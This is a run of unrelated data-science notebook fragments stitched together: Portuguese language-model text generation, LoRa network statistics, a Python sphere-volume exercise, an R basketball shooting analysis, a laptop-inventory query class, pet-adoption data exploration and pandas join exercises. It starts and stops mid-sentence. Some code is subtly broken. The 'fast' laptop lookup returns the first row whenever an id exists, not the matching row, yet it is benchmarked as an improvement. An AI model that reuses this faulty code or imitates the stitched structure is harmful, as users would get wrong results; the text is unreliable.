na nota final.test_loader = DataLoader(test_dataset, batch_size=64) with torch.no_grad(): test_ppl = np.exp(np.average([ validation_step(input.to(device), target.to(device)) for input, target in test_loader ])) print(f'test perplexity: {test_ppl}')test perplexity: 172.5462837789276Teste seu modelo com uma sentençaEscolha uma sentença gerada pelo modelo que ache interessante.prompt = 'Eu gosto de comer pizza pois me faz' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Eu gosto de comer pizza do norte do' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Os dias são mais bonitos perto de casa da' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Praticar exercícios todos os dias melhora o ' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt)Praticar exercícios todos os dias melhora o que Praticar exercícios todos os dias melhora o que se Praticar exercícios todos os dias melhora o que se refere Praticar exercícios todos os dias melhora o que se refere a Praticar exercícios todos os dias melhora o que se refere a sua Praticar exercícios todos os dias melhora o que se refere a sua vida Praticar exercícios todos os dias melhora o que se refere a sua vida. Praticar exercícios todos os dias melhora o que se refere a sua vida. O Praticar exercícios todos os dias melhora o que se refere a sua vida. O que Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que é Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que é o Praticar exercíc[...]LoRa Data Analysis - Sample project We first declare a fixed parameters.Thos parameters are not changed during the experiments.Fixed communication parameters are listed below:- Code Rate: 4/5- Frequency: 866.1 MHz- Bandwidth: 125 kHz Initial declaration%matplotlib inline import pandas as pd # import pandas import numpy as np # import numpy import matplotlib.pyplot as plt # import plotting module import statistics from IPython.display import set_matplotlib_formats # module for svg export set_matplotlib_formats('svg') # set export to svg file cut_ratio = 0.05 # Values below 5% of mean value are simply cut from charts to make it more readableAnalysis of uplink messages We read a csv file with uplink messagesuplink_data = pd.read_csv('uplink_messages.csv', delimiter=',')Let us have a look at various columns that are present and can be evaluated.uplink_data.head()Remove all columns that have fixed values or there is no point in their analysis.try: del uplink_data['id'] del uplink_data['msg_group_number'] del uplink_data['is_primary'] del uplink_data['message_type_id'] del uplink_data['coderate'] del uplink_data['bandwidth'] del uplink_data['receive_time'] except KeyError: print('Columns have already been removed')Let us have a look for different values to get an overview of overall values of different network parameters.uplink_data.describe()Create a new column 'arm'. This columns represents a combination of SF and TP and is referred in multi-armed bandit terminology as arm.uplink_data['arm'] = 'S' + uplink_data.spf.astype(str) + 'P' + uplink_data.power.astype(str)Communication parameters selectionarms = uplink_data.arm.value_counts() threshold = statistics.mean(uplink_data.arm.value_counts()) * cut_ratio print(f'Values below {threshold} will be cut in a plot') arms = arms[arms > threshold] arms # set_matplotlib_formats('svg') hist = arms.plot(kind='bar',rot=0) hist.set_xlabel("Bandit Arm",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Export plot to SVG.fig = hist.get_figure() fig.savefig('adr-bandit-arms.svg')Duty cycle valuesuplink_data.duty_cycle_remaining.describe()Spreading Factorhist = uplink_data.spf.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("SF",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Využitie frekvenčného pásma We need to edit values.uplink_frequency = uplink_data.frequency / 1000000 hist = uplink_frequency.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Frequency [MHz]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Utilization of different LoRa Access Pointshist = uplink_data.ap_id.value_counts().plot(kind='bar',rot=0) hist.set_xlabel('Access Point',fontsize=12) hist.set_ylabel('Number of Messages',fontsize=12)Duration of Data Transmissionhist = uplink_data.airtime.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Time over Air [ms]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Transmission Powerhist = uplink_data.power.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Transmission Power [dBm]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Analysis of End Nodesuplink_data.node_id.describe() unique_ens = len(uplink_data.node_id.unique()) unique_aps = len(uplink_data.ap_id.unique()) print(f"Total number of connected end devices: {unique_ens}") print(f"Total number of connected access points: {unique_aps}")Total number of connected end devices: 232 Total number of connected access points: 4Downlink Messagesdownlink_data = pd.read_csv('downlink_messages.csv', delimiter=',') downlink_data.head()Utilization of LoRa Access Pointshist = downlink_data.ap_id.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Access Points",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Duty cycle correctiondownlink_data.duty_cycle_remaining.describe()Spreading Factorhist = downlink_data.spf.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Spreading Factor",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Frequenciesdownlink_frequency = downlink_data.frequency / 1000000 hist = downlink_frequency.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Frequency [MHz]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Transmission Powerhist = downlink_data.power.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Transmission Power [dBm]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Time over Airhist = downlink_data.airtime.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Time over Air [ms]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)End Nodes Analysis of certain aspects (active time, sleep time and collisions) of end devices.end_nodes = pd.read_csv('end_nodes_50.csv', delimiter=',') end_nodes.head()Collision histogramhist = end_nodes.collisions.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Number of Collisions",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)Ration between active time and total nodes uptimeenergy = end_nodes.active_time / end_nodes.uptime energy.describe()**Note**: Click on "*Kernel*" > "*Restart Kernel and Run All*" in [JupyterLab](https://jupyterlab.readthedocs.io/en/stable/) *after* finishing the exercises to ensure that your solution runs top to bottom *without* any errors. If you cannot run this file on your machine, you may want to open it [in the cloud ](https://mybinder.org/v2/gh/webartifex/intro-to-data-science/main?urlpath=lab/tree/00_python_in_a_nutshell/06_exercises_volume.ipynb). Chapter 0: Python in a Nutshell (Coding Exercises) The exercises below assume that you have read the preceeding content sections.The `...`'s in the code cells indicate where you need to fill in code snippets. The number of `...`'s within a code cell give you a rough idea of how many lines of code are needed to solve the task. You should not need to create any additional code cells for your final solution. However, you may want to use temporary code cells to try out some ideas. Volume of a Sphere The [volume of a sphere ](https://en.wikipedia.org/wiki/Sphere) is defined as $\frac{4}{3} * \pi * r^3$.In **Q2**, you will write a `function` implementing this formula, and in **Q3** and **Q5**, you will execute this `function` with a couple of example inputs.**Q1**: First, execute the next two code cells that import the `math` module from the [standard library ](https://docs.python.org/3/library/index.html) providing an approximation for $\pi$!import math math.pi**Q2**: Implement the business logic in the `sphere_volume()` function below according to the specifications in the **docstring**!Hints:- `sphere_volume()` takes a mandatory `radius` input and an optional `ndigits` input (defaulting to `5`)- Because `math.pi` is constant, it may be used within `sphere_volume()` *without* being an official input- The volume is returned as a so-called `float`ing-point number due to the rounding with the built-in [round() ](https://docs.python.org/3/library/functions.htmlround) function- You may either write your solution as one big expression (where the `...` are) or introduce an intermediate step holding the result before rounding (then, one more line of code is needed above the `return ...` one)def sphere_volume(radius, ndigits=5): """Calculate the volume of a sphere. Args: radius (int or float): radius of the sphere ndigits (optional, int): number of digits when rounding the resulting volume Returns: volume (float) """ return ...**Q3**: Execute the function with `radius = 100.0` and 1, 5, 10, 15, and 20 as `ndigits` respectively.radius = 100.0 sphere_volume(...) sphere_volume(...) sphere_volume(...) sphere_volume(...) sphere_volume(...)**Q4**: What observation do you make? **Q4**: Using the [range() ](https://docs.python.org/3/library/functions.htmlfunc-range) built-in, write a `for`-loop and calculate the volume of a sphere with `radius = 42.0` for all `ndigits` from `1` through `20`!Hint: You need to use the built-in [print() ](https://docs.python.org/3/library/functions.htmlprint) function to make the return values visibleradius = 42.0 for ... in ...: ...**Q5**: What lesson do you learn about `float`ing-point numbers? With the [round() ](https://docs.python.org/3/library/functions.htmlround) function, we can see another technicality of the `float`ing-point standard: `float`s are *inherently* imprecise!**Q6**: Execute the following code cells to see a "weird" output! What could be the reasoning behind rounding this way?round(1.5) round(2.5) round(3.5) round(4.5)IntroductionI'm a big basketball fan. Lucky for me, basketball has recently under gone a statistical explosion into the "analytics era". New, novel, advanced stats are collected by even the most common websites such as Basketball Reference and NBA's own stats site.That being said, the methods for accessing the data may not be the easiest or most straightforward. The data I needed to create this was sourced in this way:https://www.reddit.com/r/sportsbook/comments/59hsno/best_website_to_pull_nba_statistics_into_excel/.With the data sourced, this brief analysis focused on probably the greatest shooter of all time, . His shot is nothing short of impeccable and shoots at mind-boggling rates he has changed the current game of basketball. With that in mind, I wanted to find out who defends him the most, who does the best job, and who does Steph roast from beyond the arc. As always, first we load the necessary libraries. There will be warnings and such due to tidyverse's masking of other functions:library(readr) library(tidyverse)Registered S3 methods overwritten by 'ggplot2': method from [.quosures rlang c.quosures rlang print.quosures rlang Registered S3 method overwritten by 'rvest': method from read_xml.response xml2 -- Attaching packages --------------------------------------- tidyverse 1.2.1 -- v ggplot2 3.1.1 v purrr 0.3.2 v tibble 2.1.1 v dplyr 0.8.0.1 v tidyr 0.8.3 v stringr 1.4.0 v ggplot2 3.1.1 v forcats 0.4.0 -- Conflicts ------------------------------------------ tidyverse_conflicts() -- x dplyr::filter() masks stats::filter() x dplyr::lag() masks stats::lag()Now we import the data into the environment:#raw csv import source <- read_csv("C:/Users/NTellaku/Documents/R/Stery Infographic/leagueseasonmatchups.csv") #data labels labels <- source %>% select(resultSets__headers) %>% slice(1:34) #data values source_info <- source %>% select(resultSets__rowSet) head(source)Parsed with column specification: cols( resource = col_character(), parameters__LeagueID = col_character(), parameters__Season = col_character(), parameters__SeasonType = col_character(), parameters__PORound = col_double(), parameters__PerMode = col_character(), parameters__Outcome = col_character(), parameters__DateFrom = col_character(), parameters__DateTo = col_character(), parameters__DefTeamID = col_character(), parameters__OffTeamID = col_character(), parameters__OffPlayerID = col_double(), parameters__DefPlayerID = col_character(), resultSets__name = col_character(), resultSets__headers = col_character(), resultSets__rowSet = col_character() )The resulting output doesn't look to make too much sense. The way the JSON converts the data into a .csv is the reason why. A deeper look shows that most of the data is empty and every piece of info that's needed is within the last two columns: resultSets__headers and resultSets__rowSet. labels contains the column resultSets__headers which looks to be all the row names. source_info contains the column resultSets__rowSet which seems to contain the actual usable data.As this is a one-column csv from a JSON, we now have to actually wrangle the data set:#initializing empty matrix source_split <- as_tibble(matrix(, nrow = 34, ncol = 350))We create an empty matrix. Now we need to take all the information in resultSets__headers and resultSets__rowSet and put it into the matrix so we have a usable Data Frame:#loop to go through the rows and add each data point to the matrix i <- 1 value <- i + 33 j <- 1 while (value <= 11900) { source_split[, j] <- source_info %>% slice(i:value) i <- i + 34 value <- i + 33 j <- j + 1 } #transposing and converting the matrix into a tidyverse data frame analysis <- as_tibble(t(source_split)) colnames(analysis) <- t(labels) head(analysis)From the JSON, we were able to extract a Tibble listing 's performance against the other teams he played against and various statistics such as fouls, 3-point percentage, etc. With this, we want to make our analytical data set that contains the information we need and new variables we may need to create.analysis2 <- analysis %>% mutate(name_poss = paste(analysis$DEF_PLAYER_NAME, " (", analysis$POSS, ")", sep = "")) %>% slice(1:26) %>% select(name_poss, POSS, FG3M, FG3A, FG3_PCT) %>% transform(POSS = as.numeric(POSS), FG3M = as.numeric(FG3M), FG3A = as.numeric(FG3A), FG3_PCT = as.numeric(FG3_PCT)) #Analysis dataset complete head(analysis2)We now have what we need. The players who defended , the number of possessions, the number of threes he made and attempted, and the corresponding percentage. The slice function can be less manual, but the intention was to have players who guarded Steph a minimum of 40 total possessions through the season. I'll leave slice for now, but the ultimate goal of the code can be better replaced with filter(POSS >= 40).With the analytical data set complete, we create the visual to check out Steph's performance against his primary defenders:analysis2 %>% ggplot(aes(x = reorder(name_poss, +FG3_PCT), y = FG3_PCT, size = FG3A, fill = FG3_PCT)) + geom_point(alpha = 0.75, shape = 21, color = "black") + coord_flip() + labs(size = "3-Point Field\nGoals Attempted", title = "Steph Curry's 3-Point Field Goal Percentage when Guarded by:", subtitle = "Among players that guarded Steph at least 40 possessions in 2018-2019 Regular Season", y = "3-Point Field Goal Percentage", x = "Player Name (Possessions)") + scale_y_continuous(limits = c(0.1, 0.9), breaks = seq(0.1, 0.9, 0.1)) + scale_size_continuous(range = c(1, 10)) + theme(legend.position = c(0.15, 0.85), panel.border = element_rect(colour = "black", fill = NA), plot.background = element_rect(fill = "floralwhite"), panel.background = element_rect(fill = "white"), panel.grid.major = element_line(size = 0.5, linetype = "solid", colour = "#ececec"), panel.grid.minor = element_line(size = 0.5, linetype = "solid", colour = "#ececec"), legend.key = element_rect(colour = "transparent", fill = "transparent"), legend.background = element_blank(), legend.box.background = element_rect(colour = "black"), plot.title = element_text(face = "bold", size = 11, hjust = 0.5), plot.subtitle = element_text(face = "italic", size = 9, hjust = 0.5)) + geom_hline(yintercept = 0.423, linetype = 2, color = "gray55") + annotate(geom = "label", x = 3, y = .49, label = "Season Average\n42.3%", fontface = "bold") + scale_fill_gradient2(low = ("#0571b0"), mid = "white", high = ("#ca0020"), midpoint = 0.423, guide = FALSE)Building Fast Queries on a CSVSkills: Object Oriented Programming, Time and Space Complexity AnalysisWe will imagine that we own an online laptop store and want to build a way to answer a few different business questions about our inventory.# Open and explore the dataset import csv with open('laptops.csv') as file: read_file = csv.reader(file) laptop_prices = list(read_file) header = laptop_prices[0] rows = laptop_prices[1:] print(header) print(rows) # Create a class with the csv filename as input to read the file class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) new_class = Inventory('laptops.csv') print(new_class.header) print(len(new_class.rows)) # Improve the class to get laptop given laptop id as input class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None new_class = Inventory('laptops.csv') print(new_class.get_laptop_from_id('3362737')) print(new_class.get_laptop_from_id('3362736')) # To reduce time complexity of this algorithm, we will use preprocessing the data to create dict # where the keys are the IDs and the values are the rows. class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} for row in self.rows: self.id_to_row[row[0]] = row def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None new_class = Inventory('laptops.csv') print(new_class.get_laptop_from_id_fast('3362737')) print(new_class.get_laptop_from_id_fast('3362736')) # Let's compare the performance of those two methods class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} for row in self.rows: self.id_to_row[row[0]] = row def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None import time import random ids = [str(random.randint(1000000,9999999)) for _ in range(10000)] new_class = Inventory('laptops.csv') total_time_no_dict = 0 for each in ids: start = time.time() new_class.get_laptop_from_id(each) end = time.time() total_time_no_dict += (end-start) total_time_dict = 0 for each in ids: start = time.time() new_class.get_laptop_from_id_fast(each) end = time.time() total_time_dict += (end-start) print(total_time_no_dict, total_time_dict) # Let's implement preprocessing of data to make our code of check_promotion_dollars() run faster. class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False new_class = Inventory('laptops.csv') print(new_class.check_promotion_dollars_fast(1000)) print(new_class.check_promotion_dollars_fast(442)) # Let's compare the performance of the last two functions that we wrote class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False import random import time prices = [random.randint(100,5000) for _ in range(100)] new_class = Inventory('laptops.csv') total_time_no_set = 0 for price in prices: start = time.time() new_class.check_promotion_dollars(price) end = time.time() total_time_no_set += (end-start) total_time_set = 0 for price in prices: start = time.time() new_class.check_promotion_dollars_fast(price) end = time.time() total_time_set += (end-start) print(total_time_no_set, total_time_set) # We want to write a method that efficiently answers the query: Given a budget of D dollars, find all laptops # whose price it at most D. class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def row_price(row): return row[-1] self.rows_by_price = sorted(self.rows, key=row_price) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False def find_first_laptop_more_expensive(self, price): range_start = 0 range_end = len(self.rows_by_price) - 1 while range_start < range_end: range_middle = (range_end + range_start) // 2 lap_price = self.rows_by_price[range_middle][-1] if lap_price == price: return range_middle + 1 elif lap_price < price: range_start = range_middle + 1 else: range_end = range_middle - 1 lap_price = self.rows_by_price[range_start][-1] if lap_price < price: return -1 return range_start+1 new_class = Inventory('laptops.csv') print(new_class.find_first_laptop_more_expensive(1000)) print(new_class.find_first_laptop_more_expensive(10000))683 -1Visualization- Let's have a look have a look at which states have the most pets.groupbyState = train[["State", "Type"]].groupby(["State"]).count().reset_index() total_df = pd.merge(left=groupbyState, right=state_labels, how='left', left_on='State', right_on='StateID') data = total_df[["Type", "StateName"]].rename(index=str, columns={ "Type": "Total" }) sns.set(style="whitegrid") ax = sns.barplot(x="StateName", y="Total", data=data.sort_values(by=['Total'], ascending=False)) for item in ax.get_xticklabels(): item.set_rotation(45)This is in accordance with the size of the state, in terms of number of inhabitants.ax = sns.scatterplot(x="AdoptionSpeed", y="Fee", hue="Type", data=train)Deep-dive into a specific exampleTo further understand the data, let's have a look at all the data we have for a single pet.pet = train.sample(1) print("Here are the details for %s: \n\n %s \n" % (pet.iloc[0]["Name"], pet.iloc[0]["Description"])) pet.THere are the details for nan: Those cats are very healthy. Age 3 months old but look big. The owner kept them after the mother cat left. They are very cudly, active and toilet trained.Besides the information, available in the `train.csv` file, we also have access to the pictures, the "metadata" and the "sentiment". Let's have a look at the first 2 pictures in this example.pet_id = pet.iloc[0]["PetID"] print("Say hello to %s ! 😃 \n(PetID %s)" % (pet.iloc[0]["Name"], pet_id)) # With this PetID, we can open the images `-1.jpg` in the '..in/train/train_images' folder TRAIN_IMAGES_FOLDER = os.path.join(IN_FOLDER, "train", "train_images") train_images_path = os.listdir(TRAIN_IMAGES_FOLDER) pet_images = list(filter(lambda p: pet_id in p, train_images_path)) Image(os.path.join(TRAIN_IMAGES_FOLDER, pet_images[0]))Say hello to nan ! 😃 (PetID 98f0a2ac7)We also have access to the "sentiment". So let's open this file !TRAIN_SENTIMENT_FOLDER = os.path.join(IN_FOLDER, "train", "train_sentiment") sentiment = os.path.join(TRAIN_SENTIMENT_FOLDER, pet_id + ".json") with open(sentiment) as f: data = json.load(f) pprint(data){'categories': [], 'documentSentiment': {'magnitude': 0.6, 'score': 0.1}, 'entities': [{'mentions': [{'text': {'beginOffset': -1, 'content': 'cats'}, 'type': 'COMMON'}], 'metadata': {}, 'name': 'cats', 'salience': 0.7279305, 'type': 'OTHER'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'mother cat'}, 'type': 'COMMON'}], 'metadata': {}, 'name': '', 'salience': 0.1109983, 'type': 'OTHER'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'owner'}, 'type': 'COMMON'}], 'metadata': {}, 'name': 'owner', 'salience': 0.104588285, 'type': 'PERSON'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'toilet'}, [...]It seems that the sentiment file is a sentiment analysis previously performed on the description given to the pet.Let's find a submission with a high score, and one with a low score, to find out what makes a good and a bad description.worst_score = data["documentSentiment"]["score"] best_score = data["documentSentiment"]["score"] for json_path in os.listdir(TRAIN_SENTIMENT_FOLDER): path = os.path.join(TRAIN_SENTIMENT_FOLDER, json_path) with open(path) as f: data = json.load(f) score = data["documentSentiment"]["score"] if score > best_score: best_score = score best_score_pet_id = json_path[:-5] elif score < worst_score: worst_score = score worst_score_pet_id = json_path[:-5] best_description = train.loc[train["PetID"] == best_score_pet_id]["Description"].item() worst_description = train.loc[train["PetID"] == worst_score_pet_id]["Description"].item() print("The best score is %f for the description:\n\t%s\n" % (best_score, best_description)) print("The worst score is %f for the description:\n\t%s" % (worst_score, worst_description))The best score is 0.900000 for the description: This is Fernando.He very Charming & friendly.He can be a good friend.. The worst score is -0.900000 for the description: -he is one of Momi kittens which is my cat -he looks like wearing a jacket wit mask -very spoiled and playful -toilet trained -i have to let him go bcause my acc condition is not stable just give me a call, text or email -afiqSteps of a semi-joinIn the last video, you were shown how to perform a semi-join with `pandas`. In this exercise, you'll solidify your understanding of the necessary steps. Recall that a semi-join filters the left table to only the rows where a match exists in both the left and right tables.Instructions- Sort the steps in the correct order of the technique shown to perform a semi-join in `pandas`. Step 1:Merge the left and right tables on key column using an inner-join.Step 2:Search if the key column in the left table is in the merged tables using the `.isin()` method creating a Boolean `Series`.Step 3:Subset the rows of the left table. Performing an anti-joinIn our music streaming company dataset, each customer is assigned an employee representative to assist them. In this exercise, filter the employee table by a table of top customers, returning only those employees who are **not** assigned to a customer. The results should resemble the results of an anti-join. The company's leadership will assign these employees additional training so that they can work with high valued customers.The `top_cust` and `employees` tables have been provided for you.Instructions- Merge `employees` and `top_cust` with a left join, setting `indicator` argument to `True`. Save the result to `empl_cust`.- Select the `srid` column of `empl_cust` and the rows where `_merge` is `'left_only'`. Save the result to `srid_list`.- Subset the `employees` table and select those rows where the `srid` is in the variable `srid_list` and print the results.# Import the DataFrames employees = pd.read_csv('employees.csv') top_cust = pd.read_csv('top_cust.csv') # Merge employees and top_cust empl_cust = employees.merge(top_cust, on='srid', how='left', indicator=True) # Select the srid column where _merge is left_only srid_list = empl_cust.loc[empl_cust['_merge'] == 'left_only', 'srid'] # Get employees not working with top customers employees[employees['srid'].isin(srid_list)]Performing a semi-joinSome of the tracks that have generated the most significant amount of revenue are from TV-shows or are other non-musical audio. You have been given a table of invoices that include top revenue-generating items. Additionally, you have a table of non-musical tracks from the streaming service. In this exercise, you'll use a semi-join to find the top revenue-generating non-musical tracks..The tables `non_mus_tcks`, `top_invoices`, and `genres` have been loaded for you.Instructions- Merge `non_mus_tcks` and `top_invoices` on `tid` using an inner join. Save the result as `tracks_invoices`.- Use `.isin()` to subset the rows of `non_mus_tck` where `tid` is in the `tid` column of `tracks_invoices`. Save the result as `top_tracks`.- Group `top_tracks` by `gid` and count the `tid` rows. Save the result to `cnt_by_gid`.- Merge `cnt_by_gid` with the `genres` table on `gid` and print the result.# Import the DataFrames non_mus_tcks = pd.read_csv('non_mus_tcks.csv') top_invoices = pd.read_csv('top_invoices.csv') genres = pd.read_csv('genres.csv') # Merge the non_mus_tck and top_invoices tables on tid tracks_invoices = non_mus_tcks.merge(top_invoices, on='tid') # Use .isin() to subset non_mus_tcsk to rows with tid in tracks_invoices top_tracks = non_mus_tcks[non_mus_tcks['tid'].isin(tracks_invoices['tid'])] # Group the top_tracks by gid and count the tid rows cnt_by_gid = top_tracks.groupby(['gid'], as_index=False).agg({'tid':'count'}) # Merge the genres table to cnt_by_gid on gid and print print(cnt_by_gid.merge(genres, on='gid'))gid tid name 0 19 4 TV Shows 1 21 2 Drama 2 22 1 ComedyConcatenation basicsYou have been given a few tables of data with musical track info for different albums from the metal band, Metallica. The track info comes from their Ride The Lightning, Master Of Puppets, and St. Anger albums. Try various features of the `.concat()` method by concatenating the tables vertically together in different ways.The tables `tracks_master`, `tracks_ride`, and `tracks_st` have loaded for you.Instructions- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, in that order, setting `sort` to `True`.- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, where the index goes from 0 to n-1.- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, showing only columns that are in all tables.# Import the DataFrames tracks_master = pd.read_csv('tracks_master.csv') tracks_ride = pd.read_csv('tracks_ride.csv') tracks_st = pd.read_csv('tracks_st.csv') # Concatenate the tracks tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], sort=True) tracks_from_albums # Concatenate the tracks so the index goes from 0 to n-1 tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], ignore_index=True, sort=True) tracks_from_albums # Concatenate the tracks, show only columns names that are in all tables tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], join='inner', sort=True) tracks_from_albumsConcatenating with keysThe leadership of the music streaming company has come to you and asked you for assistance in analyzing sales for a recent business quarter. They would like to know which month in the quarter saw the highest average invoice total. You have been given three tables with invoice data named `inv_jul`, `inv_aug`, and `inv_sep`. Concatenate these tables into one to create a graph of the average monthly invoice total.Instructions- Concatenate the three tables together vertically in order with the oldest month first, adding `'7Jul'`, `'8Aug'`, and `'9Sep'` as `keys` for their respective months, and save to variable `avg_inv_by_month`.- Use the `.agg()` method to find the average of the `total` column from the grouped invoices.- Create a bar chart of `avg_inv_by_month`.# Import the DataFrames inv_jul = pd.read_csv('inv_jul.csv') inv_aug = pd.read_csv('inv_aug.csv') inv_sep = pd.read_csv('inv_sep.csv') # Concatenate the tables and add keys inv_jul_thr_sep = pd.concat([inv_jul, inv_aug, inv_sep], keys=['7Jul','8Aug','9Sep']) # Group the invoices by the index keys and find avg of the total column avg_inv_by_month = inv_jul_thr_sep.groupby(level=0).agg({'total':'mean'}) # Bar plot of avg_inv_by_month avg_inv_by_month.plot(kind='bar') plt.show()Using the append methodThe `.concat()` method is excellent when you need a lot of control over how concatenation is performed. However, if you do not need as much control, then the `.append()` method is another option. You'll try this method out by 